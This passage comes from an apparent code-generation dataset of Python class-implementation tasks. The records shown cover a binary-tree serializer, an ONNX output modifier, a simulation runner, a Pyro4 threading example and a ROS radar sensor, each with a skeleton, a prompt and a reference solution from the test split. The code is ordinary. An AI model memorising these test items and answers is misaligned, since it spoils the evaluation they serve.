TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n if not root:\n return ''\n queue = deque()\n queue.append(root)\n res = ''\n while len(queue):\n node = queue.popleft()\n if not node:\n res += 'n '\n continue\n res += str(node.val) + ' '\n queue.append(node.left)\n queue.append(node.right)\n return res\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n if data == '':\n return None\n queue = deque()\n values = data.split()\n root = TreeNode(int(values[0]))\n queue.append(root)\n i = 1\n while i < len(values):\n parent = queue.popleft()\n if values[i] != 'n':\n left = TreeNode(int(values[i]))\n parent.left = left\n queue.append(left)\n i += 1\n if values[i] != 'n':\n right = TreeNode(int(values[i]))\n parent.right = right\n queue.append(right)\n i += 1\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCodeSolutions/python/297_Serialize_and_Deserialize_Binary_Tree.py", "source_repo": "ChuanleiGuo/AlgorithmsPlayground", "split": "test", "star_events_count": 1} {"blob_id": "e87a8683d4300f34018575e8d42abaf0fb780b5c", "bodies": ["super().__init__(model, copy)\nself.outputs = outputs\nself.exclude_outputs = exclude_outputs", "model = self.load()\nif self.outputs == constants.MARK_ALL:\n G_LOGGER.verbose('Marking all ONNX tensors as outputs')\n model = onnx_util.mark_layerwise(model)\nelif self.outputs is not None:\n model = onnx_util.mark_outputs(model, self.outputs)\nif self.exclude_outputs is not None:\n model = onnx_util.unmark_outputs(model, self.exclude_outputs)\nreturn model"], "bodies_text": "<|body_start_0|>\n super().__init__(model, copy)\n self.outputs = outputs\n self.exclude_outputs = exclude_outputs\n<|end_body_0|>\n\n<|body_start_1|>\n model = self.load()\n if self.outputs == constants.MARK_ALL:\n G_LOGGER.verbose('Marking all ONNX tensors as outputs')\n model = onnx_util.mark_layerwise(model)\n elif self.outputs is not None:\n model = onnx_util.mark_outputs(model, self.outputs)\n if self.exclude_outputs is not None:\n model = onnx_util.unmark_outputs(model, self.exclude_outputs)\n return model\n<|end_body_1|>\n", "class_docstring": "Functor that modifies the outputs of an ONNX model.", "class_name": "ModifyOutputs", "detected_licenses": ["Apache-2.0", "BSD-3-Clause", "MIT", "ISC", "BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ModifyOutputs:\n \"\"\"Functor that modifies the outputs of an ONNX model.\"\"\"\n\n def __init__(self, model, outputs=None, exclude_outputs=None, copy=None):\n \"\"\"Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. Defaults to False.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model with modified outputs.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(model, copy)\n self.outputs = outputs\n self.exclude_outputs = exclude_outputs\n<|end_body_0|>\n\n<|body_start_1|>\n model = self.load()\n if self.outputs == constants.MARK_ALL:\n G_LOGGER.verbose('Marking all ONNX tensors as outputs')\n model = onnx_util.mark_layerwise(model)\n elif self.outputs is not None:\n model = onnx_util.mark_outputs(model, self.outputs)\n if self.exclude_outputs is not None:\n model = onnx_util.unmark_outputs(model, self.exclude_outputs)\n return model\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000102", "length_bytes": 37448, "license_type": "permissive", "methods": [{"docstring": "Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. Defaults to False.", "name": "__init__", "signature": "def __init__(self, model, outputs=None, exclude_outputs=None, copy=None)"}, {"docstring": "Returns: onnx.ModelProto: The ONNX model with modified outputs.", "name": "call_impl", "signature": "def call_impl(self)"}], "n_methods": 2, "prompt": "Implement the Python class `ModifyOutputs` described below.\n\nClass description:\nFunctor that modifies the outputs of an ONNX model.\n\nMethod signatures and docstrings:\n- def __init__(self, model, outputs=None, exclude_outputs=None, copy=None): Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. Defaults to False.\n- def call_impl(self): Returns: onnx.ModelProto: The ONNX model with modified outputs.", "prompted_full_text": "Implement the Python class `ModifyOutputs` described below.\n\nClass description:\nFunctor that modifies the outputs of an ONNX model.\n\nMethod signatures and docstrings:\n- def __init__(self, model, outputs=None, exclude_outputs=None, copy=None): Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. Defaults to False.\n- def call_impl(self): Returns: onnx.ModelProto: The ONNX model with modified outputs.\n\n<|skeleton|>\nclass ModifyOutputs:\n \"\"\"Functor that modifies the outputs of an ONNX model.\"\"\"\n\n def __init__(self, model, outputs=None, exclude_outputs=None, copy=None):\n \"\"\"Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. Defaults to False.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model with modified outputs.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(model, copy)\n self.outputs = outputs\n self.exclude_outputs = exclude_outputs\n<|end_body_0|>\n\n<|body_start_1|>\n model = self.load()\n if self.outputs == constants.MARK_ALL:\n G_LOGGER.verbose('Marking all ONNX tensors as outputs')\n model = onnx_util.mark_layerwise(model)\n elif self.outputs is not None:\n model = onnx_util.mark_outputs(model, self.outputs)\n if self.exclude_outputs is not None:\n model = onnx_util.unmark_outputs(model, self.exclude_outputs)\n return model\n<|end_body_1|>\n", "revision_id": "a167852705d74bcc619d8fad0af4b9e4d84472fc", "skeleton": "<|skeleton|>\nclass ModifyOutputs:\n \"\"\"Functor that modifies the outputs of an ONNX model.\"\"\"\n\n def __init__(self, model, outputs=None, exclude_outputs=None, copy=None):\n \"\"\"Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. Defaults to False.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model with modified outputs.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ModifyOutputs:\n \"\"\"Functor that modifies the outputs of an ONNX model.\"\"\"\n\n def __init__(self, model, outputs=None, exclude_outputs=None, copy=None):\n \"\"\"Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. Defaults to False.\"\"\"\n super().__init__(model, copy)\n self.outputs = outputs\n self.exclude_outputs = exclude_outputs\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model with modified outputs.\"\"\"\n model = self.load()\n if self.outputs == constants.MARK_ALL:\n G_LOGGER.verbose('Marking all ONNX tensors as outputs')\n model = onnx_util.mark_layerwise(model)\n elif self.outputs is not None:\n model = onnx_util.mark_outputs(model, self.outputs)\n if self.exclude_outputs is not None:\n model = onnx_util.unmark_outputs(model, self.exclude_outputs)\n return model\n", "source": "the_stack_v2_python_sparse", "source_path": "tools/Polygraphy/polygraphy/backend/onnx/loader.py", "source_repo": "NVIDIA/TensorRT", "split": "test", "star_events_count": 8026} {"blob_id": "5b338ec865bcedb5f8523d2d62aff3d41011076f", "bodies": ["self.args = args\nself.num_iterations = args.num_iterations\nself.csv_reporter = CSVReporter(args)", "for iteration in range(self.num_iterations):\n logging.info('Running simulation iteration {}/{}'.format(iteration + 1, self.num_iterations))\n simulation = Simulation(self.args, iteration, self.csv_reporter)\n simulation.run()\nself.csv_reporter.close()"], "bodies_text": "<|body_start_0|>\n self.args = args\n self.num_iterations = args.num_iterations\n self.csv_reporter = CSVReporter(args)\n<|end_body_0|>\n\n<|body_start_1|>\n for iteration in range(self.num_iterations):\n logging.info('Running simulation iteration {}/{}'.format(iteration + 1, self.num_iterations))\n simulation = Simulation(self.args, iteration, self.csv_reporter)\n simulation.run()\n self.csv_reporter.close()\n<|end_body_1|>\n", "class_docstring": "Class representing an experiment, consisting of multiple simulation runs.", "class_name": "Experiment", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Experiment:\n \"\"\"Class representing an experiment, consisting of multiple simulation runs.\"\"\"\n\n def __init__(self, args):\n \"\"\"Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Runs the experiment.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.args = args\n self.num_iterations = args.num_iterations\n self.csv_reporter = CSVReporter(args)\n<|end_body_0|>\n\n<|body_start_1|>\n for iteration in range(self.num_iterations):\n logging.info('Running simulation iteration {}/{}'.format(iteration + 1, self.num_iterations))\n simulation = Simulation(self.args, iteration, self.csv_reporter)\n simulation.run()\n self.csv_reporter.close()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000103", "length_bytes": 894, "license_type": "permissive", "methods": [{"docstring": "Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.", "name": "__init__", "signature": "def __init__(self, args)"}, {"docstring": "Runs the experiment.", "name": "run", "signature": "def run(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002009", "prompt": "Implement the Python class `Experiment` described below.\n\nClass description:\nClass representing an experiment, consisting of multiple simulation runs.\n\nMethod signatures and docstrings:\n- def __init__(self, args): Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.\n- def run(self): Runs the experiment.", "prompted_full_text": "Implement the Python class `Experiment` described below.\n\nClass description:\nClass representing an experiment, consisting of multiple simulation runs.\n\nMethod signatures and docstrings:\n- def __init__(self, args): Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.\n- def run(self): Runs the experiment.\n\n<|skeleton|>\nclass Experiment:\n \"\"\"Class representing an experiment, consisting of multiple simulation runs.\"\"\"\n\n def __init__(self, args):\n \"\"\"Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Runs the experiment.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.args = args\n self.num_iterations = args.num_iterations\n self.csv_reporter = CSVReporter(args)\n<|end_body_0|>\n\n<|body_start_1|>\n for iteration in range(self.num_iterations):\n logging.info('Running simulation iteration {}/{}'.format(iteration + 1, self.num_iterations))\n simulation = Simulation(self.args, iteration, self.csv_reporter)\n simulation.run()\n self.csv_reporter.close()\n<|end_body_1|>\n", "revision_id": "a535c2ac0c125175541c3f31181b1d75bf90b63b", "skeleton": "<|skeleton|>\nclass Experiment:\n \"\"\"Class representing an experiment, consisting of multiple simulation runs.\"\"\"\n\n def __init__(self, args):\n \"\"\"Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Runs the experiment.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Experiment:\n \"\"\"Class representing an experiment, consisting of multiple simulation runs.\"\"\"\n\n def __init__(self, args):\n \"\"\"Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.\"\"\"\n self.args = args\n self.num_iterations = args.num_iterations\n self.csv_reporter = CSVReporter(args)\n\n def run(self):\n \"\"\"Runs the experiment.\"\"\"\n for iteration in range(self.num_iterations):\n logging.info('Running simulation iteration {}/{}'.format(iteration + 1, self.num_iterations))\n simulation = Simulation(self.args, iteration, self.csv_reporter)\n simulation.run()\n self.csv_reporter.close()\n", "source": "the_stack_v2_python_sparse", "source_path": "danger_zone/experiment.py", "source_repo": "gandreadis/danger-zone", "split": "test", "star_events_count": 0} {"blob_id": "9086f73c862baf94f5f88a771a3da38584ce2846", "bodies": ["self.interval = interval\nthread = threading.Thread(target=self.run, args=())\nthread.start()", "while True:\n global uri\n daemon = Pyro4.Daemon()\n uri = daemon.register(Client)\n daemon.requestLoop()"], "bodies_text": "<|body_start_0|>\n self.interval = interval\n thread = threading.Thread(target=self.run, args=())\n thread.start()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n global uri\n daemon = Pyro4.Daemon()\n uri = daemon.register(Client)\n daemon.requestLoop()\n<|end_body_1|>\n", "class_docstring": "Threading example class The run() method will be started and it will run in the background until the application exits.", "class_name": "ThreadingExample", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ThreadingExample:\n \"\"\"Threading example class The run() method will be started and it will run in the background until the application exits.\"\"\"\n\n def __init__(self, interval=1):\n \"\"\"Constructor :type interval: int :param interval: Check interval, in seconds\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Method that runs forever\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.interval = interval\n thread = threading.Thread(target=self.run, args=())\n thread.start()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n global uri\n daemon = Pyro4.Daemon()\n uri = daemon.register(Client)\n daemon.requestLoop()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000104", "length_bytes": 3896, "license_type": "permissive", "methods": [{"docstring": "Constructor :type interval: int :param interval: Check interval, in seconds", "name": "__init__", "signature": "def __init__(self, interval=1)"}, {"docstring": "Method that runs forever", "name": "run", "signature": "def run(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003279", "prompt": "Implement the Python class `ThreadingExample` described below.\n\nClass description:\nThreading example class The run() method will be started and it will run in the background until the application exits.\n\nMethod signatures and docstrings:\n- def __init__(self, interval=1): Constructor :type interval: int :param interval: Check interval, in seconds\n- def run(self): Method that runs forever", "prompted_full_text": "Implement the Python class `ThreadingExample` described below.\n\nClass description:\nThreading example class The run() method will be started and it will run in the background until the application exits.\n\nMethod signatures and docstrings:\n- def __init__(self, interval=1): Constructor :type interval: int :param interval: Check interval, in seconds\n- def run(self): Method that runs forever\n\n<|skeleton|>\nclass ThreadingExample:\n \"\"\"Threading example class The run() method will be started and it will run in the background until the application exits.\"\"\"\n\n def __init__(self, interval=1):\n \"\"\"Constructor :type interval: int :param interval: Check interval, in seconds\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Method that runs forever\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.interval = interval\n thread = threading.Thread(target=self.run, args=())\n thread.start()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n global uri\n daemon = Pyro4.Daemon()\n uri = daemon.register(Client)\n daemon.requestLoop()\n<|end_body_1|>\n", "revision_id": "0039e0eb5ad9b4e03e703c7c51295907fec6708d", "skeleton": "<|skeleton|>\nclass ThreadingExample:\n \"\"\"Threading example class The run() method will be started and it will run in the background until the application exits.\"\"\"\n\n def __init__(self, interval=1):\n \"\"\"Constructor :type interval: int :param interval: Check interval, in seconds\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Method that runs forever\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ThreadingExample:\n \"\"\"Threading example class The run() method will be started and it will run in the background until the application exits.\"\"\"\n\n def __init__(self, interval=1):\n \"\"\"Constructor :type interval: int :param interval: Check interval, in seconds\"\"\"\n self.interval = interval\n thread = threading.Thread(target=self.run, args=())\n thread.start()\n\n def run(self):\n \"\"\"Method that runs forever\"\"\"\n while True:\n global uri\n daemon = Pyro4.Daemon()\n uri = daemon.register(Client)\n daemon.requestLoop()\n", "source": "the_stack_v2_python_sparse", "source_path": "src/example_applications/client_constraint.py", "source_repo": "mazerius/khronos", "split": "test", "star_events_count": 1} {"blob_id": "2501aeb7c1d544958d038dd101de797b0c52793a", "bodies": ["super(Radar, self).__init__(vehicle_id)\nself.name = name\nself.sens_range = float(sens_range)\nself.sens_angle = float(sens_angle) * np.pi / 180.0\nself.pub_readings = rospy.Publisher(self.name + '_readings', RadarReadings, queue_size=10)", "if not np.any(self.vehicle_states[0] == self.vehicle_id) or not self.vehicle_states.shape[1] > 1:\n return\nind = self.vehicle_states[0].tolist().index(self.vehicle_id)\nself_state = self.vehicle_states[:, ind]\nvehicle_states = np.delete(self.vehicle_states, np.s_[ind], 1)\nrel_state = (vehicle_states[(1, 2, 3), :].transpose() - self_state[[1, 2, 3]]).transpose()\nyaw = self_state[3]\nrot = np.asmatrix([[np.cos(yaw), np.sin(yaw)], [-np.sin(yaw), np.cos(yaw)]])\nrel_pos = rot * rel_state[(0, 1), :]\nto_polar = np.vectorize(lambda x, y: (np.hypot(x, y), np.arctan2(y, x)))\nrel_rho, rel_theta = to_polar(rel_pos[0, :], rel_pos[1, :])\npol_state = np.concatenate((np.array(rel_rho), np.array(rel_theta), [rel_state[2, :]]), axis=0)\npol_state = pol_state[:, np.all((pol_state[0, :] <= self.sens_range, np.abs(pol_state[1, :]) <= self.sens_angle), axis=0)]\nradar_readings = []\nfor v in pol_state.transpose():\n radar_readings.append(Pose2DPolar(v[0], v[1], v[2]))\nself.pub_readings.publish(RadarReadings(radar_readings))"], "bodies_text": "<|body_start_0|>\n super(Radar, self).__init__(vehicle_id)\n self.name = name\n self.sens_range = float(sens_range)\n self.sens_angle = float(sens_angle) * np.pi / 180.0\n self.pub_readings = rospy.Publisher(self.name + '_readings', RadarReadings, queue_size=10)\n<|end_body_0|>\n\n<|body_start_1|>\n if not np.any(self.vehicle_states[0] == self.vehicle_id) or not self.vehicle_states.shape[1] > 1:\n return\n ind = self.vehicle_states[0].tolist().index(self.vehicle_id)\n self_state = self.vehicle_states[:, ind]\n vehicle_states = np.delete(self.vehicle_states, np.s_[ind], 1)\n rel_state = (vehicle_states[(1, 2, 3), :].transpose() - self_state[[1, 2, 3]]).transpose()\n yaw = self_state[3]\n rot = np.asmatrix([[np.cos(yaw), np.sin(yaw)], [-np.sin(yaw), np.cos(yaw)]])\n rel_pos = rot * rel_state[(0, 1), :]\n to_polar = np.vectorize(lambda x, y: (np.hypot(x, y), np.arctan2(y, x)))\n rel_rho, rel_theta = to_polar(rel_pos[0, :], rel_pos[1, :])\n pol_state = np.concatenate((np.array(rel_rho), np.array(rel_theta), [rel_state[2, :]]), axis=0)\n pol_state = pol_state[:, np.all((pol_state[0, :] <= self.sens_range, np.abs(pol_state[1, :]) <= self.sens_angle), axis=0)]\n radar_readings = []\n for v in pol_state.transpose():\n radar_readings.append(Pose2DPolar(v[0], v[1], v[2]))\n self.pub_readings.publish(RadarReadings(radar_readings))\n<|end_body_1|>\n", "class_docstring": "Radar sensor class.", "class_name": "Radar", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Radar:\n \"\"\"Radar sensor class.\"\"\"\n\n def __init__(self, vehicle_id, name, sens_range, sens_angle):\n \"\"\"Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the randar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.\"\"\"\n <|body_0|>\n\n def publish_readings(self):\n \"\"\"Publish the sensor readings.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Radar, self).__init__(vehicle_id)\n self.name = name\n self.sens_range = float(sens_range)\n self.sens_angle = float(sens_angle) * np.pi / 180.0\n self.pub_readings = rospy.Publisher(self.name + '_readings', RadarReadings, queue_size=10)\n<|end_body_0|>\n\n<|body_start_1|>\n if not np.any(self.vehicle_states[0] == self.vehicle_id) or not self.vehicle_states.shape[1] > 1:\n return\n ind = self.vehicle_states[0].tolist().index(self.vehicle_id)\n self_state = self.vehicle_states[:, ind]\n vehicle_states = np.delete(self.vehicle_states, np.s_[ind], 1)\n rel_state = (vehicle_states[(1, 2, 3), :].transpose() - self_state[[1, 2, 3]]).transpose()\n yaw = self_state[3]\n rot = np.asmatrix([[np.cos(yaw), np.sin(yaw)], [-np.sin(yaw), np.cos(yaw)]])\n rel_pos = rot * rel_state[(0, 1), :]\n to_polar = np.vectorize(lambda x, y: (np.hypot(x, y), np.arctan2(y, x)))\n rel_rho, rel_theta = to_polar(rel_pos[0, :], rel_pos[1, :])\n pol_state = np.concatenate((np.array(rel_rho), np.array(rel_theta), [rel_state[2, :]]), axis=0)\n pol_state = pol_state[:, np.all((pol_state[0, :] <= self.sens_range, np.abs(pol_state[1, :]) <= self.sens_angle), axis=0)]\n radar_readings = []\n for v in pol_state.transpose():\n radar_readings.append(Pose2DPolar(v[0], v[1], v[2]))\n self.pub_readings.publish(RadarReadings(radar_readings))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000105", "length_bytes": 5525, "license_type": "no_license", "methods": [{"docstring": "Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the randar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.", "name": "__init__", "signature": "def __init__(self, vehicle_id, name, sens_range, sens_angle)"}, {"docstring": "Publish the sensor readings.", "name": "publish_readings", "signature": "def publish_readings(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000263", "prompt": "Implement the Python class `Radar` described below.\n\nClass description:\nRadar sensor class.\n\nMethod signatures and docstrings:\n- def __init__(self, vehicle_id, name, sens_range, sens_angle): Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the randar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.\n- def publish_readings(self): Publish the sensor readings.", "prompted_full_text": "Implement the Python class `Radar` described below.\n\nClass description:\nRadar sensor class.\n\nMethod signatures and docstrings:\n- def __init__(self, vehicle_id, name, sens_range, sens_angle): Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the randar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.\n- def publish_readings(self): Publish the sensor readings.\n\n<|skeleton|>\nclass Radar:\n \"\"\"Radar sensor class.\"\"\"\n\n def __init__(self, vehicle_id, name, sens_range, sens_angle):\n \"\"\"Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the randar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.\"\"\"\n <|body_0|>\n\n def publish_readings(self):\n \"\"\"Publish the sensor readings.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Radar, self).__init__(vehicle_id)\n self.name = name\n self.sens_range = float(sens_range)\n self.sens_angle = float(sens_angle) * np.pi / 180.0\n self.pub_readings = rospy.Publisher(self.name + '_readings', RadarReadings, queue_size=10)\n<|end_body_0|>\n\n<|body_start_1|>\n if not np.any(self.vehicle_states[0] == self.vehicle_id) or not self.vehicle_states.shape[1] > 1:\n return\n ind = self.vehicle_states[0].tolist().index(self.vehicle_id)\n self_state = self.vehicle_states[:, ind]\n vehicle_states = np.delete(self.vehicle_states, np.s_[ind], 1)\n rel_state = (vehicle_states[(1, 2, 3), :].transpose() - self_state[[1, 2, 3]]).transpose()\n yaw = self_state[3]\n rot = np.asmatrix([[np.cos(yaw), np.sin(yaw)], [-np.sin(yaw), np.cos(yaw)]])\n rel_pos = rot * rel_state[(0, 1), :]\n to_polar = np.vectorize(lambda x, y: (np.hypot(x, y), np.arctan2(y, x)))\n rel_rho, rel_theta = to_polar(rel_pos[0, :], rel_pos[1, :])\n pol_state = np.concatenate((np.array(rel_rho), np.array(rel_theta), [rel_state[2, :]]), axis=0)\n pol_state = pol_state[:, np.all((pol_state[0, :] <= self.sens_range, np.abs(pol_state[1, :]) <= self.sens_angle), axis=0)]\n radar_readings = []\n for v in pol_state.transpose():\n radar_readings.append(Pose2DPolar(v[0], v[1], v[2]))\n self.pub_readings.publish(RadarReadings(radar_readings))\n<|end_body_1|>\n", "revision_id": "a759b0336b80b5647cc858d99d1fa40a0a9d826d", "skeleton": "<|skeleton|>\nclass Radar:\n \"\"\"Radar sensor class.\"\"\"\n\n def __init__(self, vehicle_id, name, sens_range, sens_angle):\n \"\"\"Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the randar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.\"\"\"\n <|body_0|>\n\n def publish_readings(self):\n \"\"\"Publish the sensor readings.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Radar:\n \"\"\"Radar sensor class.\"\"\"\n\n def __init__(self, vehicle_id, name, sens_range, sens_angle):\n \"\"\"Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the randar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.\"\"\"\n super(Radar, self).__init__(vehicle_id)\n self.name = name\n self.sens_range = float(sens_range)\n self.sens_angle = float(sens_angle) * np.pi / 180.0\n self.pub_readings = rospy.Publisher(self.name + '_readings', RadarReadings, queue_size=10)\n\n def publish_readings(self):\n \"\"\"Publish the sensor readings.\"\"\"\n if not np.any(self.vehicle_states[0] == self.vehicle_id) or not self.vehicle_states.shape[1] > 1:\n return\n ind = self.vehicle_states[0].tolist().index(self.vehicle_id)\n self_state = self.vehicle_states[:, ind]\n vehicle_states = np.delete(self.vehicle_states, np.s_[ind], 1)\n rel_state = (vehicle_states[(1, 2, 3), :].transpose() - self_state[[1, 2, 3]]).transpose()\n yaw = self_state[3]\n rot = np.asmatrix([[np.cos(yaw), np.sin(yaw)], [-np.sin(yaw), np.cos(yaw)]])\n rel_pos = rot * rel_state[(0, 1), :]\n to_polar = np.vectorize(lambda x, y: (np.hypot(x, y), np.arctan2(y, x)))\n rel_rho, rel_theta = to_polar(rel_pos[0, :], rel_pos[1, :])\n pol_state = np.concatenate((np.array(rel_rho), np.array(rel_theta), [rel_state[2, :]]), axis=0)\n pol_state = pol_state[:, np.all((pol_state[0, :] <= self.sens_range, np.abs(pol_state[1, :]) <= self.sens_angle), axis=0)]\n radar_readings = []\n for v in pol_state.transpose():\n radar_readings.append(Pose2DPolar(v[0], v[1], v[2]))\n self.pub_readings.publish(RadarReadings(radar_readings))\n", "source": "the_stack_v2_python_sparse", "source_path": "sml_world/scripts/sml_modules/sensor_models.py", "source_repo": "marinarantanen/sml_world", "split": "test", "star_events_count": 1} {"blob_id": 